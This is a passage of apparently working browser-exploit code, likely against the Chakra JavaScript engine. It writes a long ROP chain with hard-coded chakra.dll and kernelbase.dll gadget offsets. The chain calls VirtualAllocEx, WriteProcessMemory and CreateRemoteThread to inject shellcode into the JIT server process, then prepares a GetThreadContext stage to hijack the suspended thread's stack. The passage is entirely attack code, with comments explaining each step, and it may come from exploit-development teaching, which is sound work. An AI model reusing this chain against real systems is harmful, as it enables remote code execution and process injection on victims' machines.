	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
	next();

	// LPVOID lpAddress (RDX)
	// Let VirtualAllocEx decide where the memory will be located
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx decide where we allocate memory in the JIT process)
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();                                                                     				   // Recall RAX already has a writable pointer in it

	// Call KERNELBASE!VirtualAllocEx
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();

	// WriteProcessMemory() ROP chain
	// Stage 3 -> Write our shellcode into the JIT process

	// Store the VirtualAllocEx return value (the address of the allocation) in the .data section of kernelbase.dll (It is currently in RAX)

	/*
	0:015> dq kernelbase+0x216000+0x4000 L2
	00007fff`58cfa000  00000000`00000000 00000000`00000000
	*/
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
	next();

	// SIZE_T nSize (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();                                                                     // Recall RAX already has a writable pointer in it

	// LPVOID lpBaseAddress (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
	next();                                                                            // (-0x8 to compensate for the gadget below, which reads from the address at a +0x8 offset)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
	next();

	// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
	next();

	// Call KERNELBASE!WriteProcessMemory
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();

	// CreateRemoteThread() ROP chain
	// Stage 4 -> Create a thread within the JIT process, but create it suspended
	// This will allow the thread to _not_ execute until we are ready
	// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
	// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
	// We will update the thread later via another ROP chain to call SetThreadContext()

	// LPTHREAD_START_ROUTINE lpStartAddress (R9)
	// This can be any random data, since it will never be executed
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);      // 0x18028b4fe: Anything we want - this will never get executed
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();

	// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
	next();

	// SIZE_T dwStackSize (R8)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
	next();

	// Call KERNELBASE!CreateRemoteThread
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
	next(); 
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
	next();

	// WriteProcessMemory() ROP chain (Number 2)
    // Stage 5 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rcx gadget and pop rdi gadget
    // Comments about this occur at the beginning of the VirtualProtect ROP chain we will inject into the JIT process

    // First, we need to preserve the thread HANDLE returned by CreateRemoteThread (currently in RAX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the thread HANDLE for storage)
    next();

    // SIZE_T nSize (R9)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();

    // HANDLE hProcess (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
    next();

    // LPVOID lpBaseAddress (RDX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
    next();                                                                       

    // LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address, which points to the value we want to write: the address of the VirtualAllocEx allocation)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
    next();

    // Call KERNELBASE!WriteProcessMemory
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();

    // WriteProcessMemory() ROP chain (Number 3)
	// Stage 6 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

	// SIZE_T nSize (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
	next();

	// LPVOID lpBaseAddress (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
	next();                                                                       

	// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address, which holds the value we want to write: the address of the VirtualAllocEx allocation)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
	next();

	// Call KERNELBASE!WriteProcessMemory
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();

	// VirtualAlloc() ROP chain
	// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

	// DWORD flProtect (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// LPVOID lpAddress (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
	next();

	// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
	next();

	// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
	next();

	// Call KERNELBASE!VirtualAlloc
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
	next();

	// GetThreadContext() ROP chain
    // Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

    // First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
    // The value we need to set is 0x10001F
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the upcoming mov qword [rax+0x20], rcx gadget writes to a valid pointer)
    next();
